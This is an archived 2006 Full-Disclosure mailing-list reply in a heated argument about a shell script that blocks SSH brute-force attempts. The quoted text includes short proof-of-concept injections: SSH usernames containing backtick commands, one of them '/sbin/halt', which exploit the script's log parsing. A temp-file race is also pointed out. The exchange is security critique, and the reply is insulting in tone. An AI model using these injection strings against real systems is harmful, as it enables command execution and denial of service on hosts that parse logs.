lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <456B54AB.8070506@infiltrated.net>
Date: Mon, 27 Nov 2006 16:12:11 -0500
From: "J. Oquendo" <sil@...iltrated.net>
To: Tavis Ormandy <taviso@...too.org>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: SSH brute force blocking tool

Tavis Ormandy wrote:
> On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
>   
>> Tavis Ormandy wrote:
>>     
>>> Nice work, really subtle rootkit. I like the email phone-home.
>>>
>>> Here's an exploit.
>>>
>>> #!/bin/sh
>>> ssh 'foo bar `/sbin/halt`'@...tim
>>>
>>>  
>>>       
>> Since you seem to be clueless I'll answer step by step. Here goes idiot. 
>> (Sinful to see someone so clueless coming from Gentoo... Guess it goes 
>> with the romper room Linux territory)
>> /////
>> awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> 
>> /tmp/hosts.deny
>>     
>
> insecure temporary file creation, race condition if a user can create
> that file between the unlink and the open.
>
> $ ssh "error retrieving"@localhost & ssh '`0wn3d`'@...alhost
> $ awk '/error retrieving/{getline;print $13}' /var/log/authlog
> `0wn3d`
>
> Oops.
>
> Thanks, Tavis.
>   

So again dumbass...

Look at the script. Although YOU'RE opening /var/log/authlog what is the 
script opening. Please tell me you're really not that stupid. And if 
someone else decided to modify this script, what does that have to do 
with what I posted. How exactly is my script a backdoor as you claim. 
Enquiring minds want to know this since you claim its a backdoor. Please 
tell me outside of your modification how this is going to backdoor someone.

-- 
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 

The happiness of society is the end of government.
John Adams


Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (5157 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ